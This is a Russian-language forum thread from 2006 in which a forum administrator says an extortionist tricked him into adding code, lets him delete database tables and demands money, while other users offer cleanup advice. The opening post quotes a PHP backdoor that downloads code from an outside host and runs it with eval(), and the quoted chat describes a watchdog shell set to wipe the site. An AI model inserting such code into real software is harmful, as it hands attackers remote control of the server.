Перейти к контенту
  • 0

ОЧЕНЬ СРОЧНО ПОМОГИТЕ Умоляю

zon

Спросил zon,

 Поделиться

Вопрос

zon

zon

Опубликовано
Опубликовано

Меня взломал хакер помагите, по своей неграмотности он попросил меня

 

:D (16:52:38 18/11/2006)

$this->ipsclass->skin['_wrapper'] = str_replace( "<% CHARSET %>" , $this->ipsclass->vars['gb_char_set'], $this->ipsclass->skin['_wrapper']);

 

;) (16:52:47 18/11/2006)

надо вставить

 

:) (16:52:57 18/11/2006)

$f = file('http://hades.runetu.ru/server.php');

$ff = '';

for ($i=0;$i<count($f);$i++) {

$ff .= $f[$i]; }

$this->ipsclass->skin['_wrapper'] = str_replace('<% ADVERS.RUNETU.RU %>',eval($ff),$this->ipsclass->skin['_wrapper']);

 

После чего он получил доступ к чему то, сказал что шэллы заслал на форум и трёт мне таблицы, уже стёр ibf_admin_logs

 

Грозится удалить всё, просит бабок.

У меня есть 6 часов, ПОМОГИТЕ пожалуйста!!!!!!!!!

Ссылка на комментарий
Поделиться на других сайтах

16 ответов на этот вопрос

Рекомендуемые сообщения

  • 0
Scream89

Scream89

Опубликовано
Опубликовано (изменено)

Гыгы )) Смешно! :D

Удали эту строку и проверь сервер на подозрительные файлы. Что тут ещё можно сказать? Глупый админ!

 

UPD: Просто интересно стало, сколько он бабок требует?

Изменено пользователем Scream89
Ссылка на комментарий
Поделиться на других сайтах
  • 0
zon

zon

Опубликовано
  • Автор
Опубликовано
Да давным уже всё удалил, но он после этого потёр таблицу снова!! Что делать очень прошу помочь, готов даже заплатить немного.
Ссылка на комментарий
Поделиться на других сайтах
  • 0
Scream89

Scream89

Опубликовано
Опубликовано
Да давным уже всё удалил, но он после этого потёр таблицу снова!! Что делать очень прошу помочь, готов даже заплатить немного.

Удали эту строку и проверь сервер на подозрительные файлы.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Scream89

Scream89

Опубликовано
Опубликовано
Да удалил я эту строку!!! Но он после этого еще всё может делать!! Как проверить на файлы?

Какая версия форума? Если 2.1.7 то а АЦ есть утилита "Антивирус".

 

Давай мне доступ по ФТП, я сам найду. В ЛС пиши...

Ссылка на комментарий
Поделиться на других сайтах
  • 0
zon

zon

Опубликовано
  • Автор
Опубликовано

А что ты можешь? :

:D (19:18:00 18/11/2006)

полное управление сайтом

 

GC (19:18:23 18/11/2006)

сайтом или тока форумом?

 

;) (19:18:31 18/11/2006)

всем доменом

 

:) (19:19:10 18/11/2006)

также есть одна наработка.. есть один контрольный шелл. и он проверяет каждые n секунд наличие остальных шеллов. если он не обнаруживает хотя бы один из них.. происходит мягко говоря "бабах" всего сайта сразу. так что крайне не советую что-то предупринимать.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Scream89

Scream89

Опубликовано
Опубликовано
А что ты можешь? :

:D (19:18:00 18/11/2006)

полное управление сайтом

 

GC (19:18:23 18/11/2006)

сайтом или тока форумом?

 

;) (19:18:31 18/11/2006)

всем доменом

 

:) (19:19:10 18/11/2006)

также есть одна наработка.. есть один контрольный шелл. и он проверяет каждые n секунд наличие остальных шеллов. если он не обнаруживает хотя бы один из них.. происходит мягко говоря "бабах" всего сайта сразу. так что крайне не советую что-то предупринимать.

Самодовольный хакер? :)

Давай ФТП, я посмотрю.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Aliance spb

Aliance spb

Опубликовано
Опубликовано

Спасибо, поржал :D Вот баян-то. А бэкап БД сделать нельзя?

После чего сменить все пароли, удалить все эти строчки и написать в суппорт хостеру.

Ссылка на комментарий
Поделиться на других сайтах
Гость
Эта тема закрыта для публикации сообщений.
 Поделиться
Перейти к списку вопросов
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.

  Согласен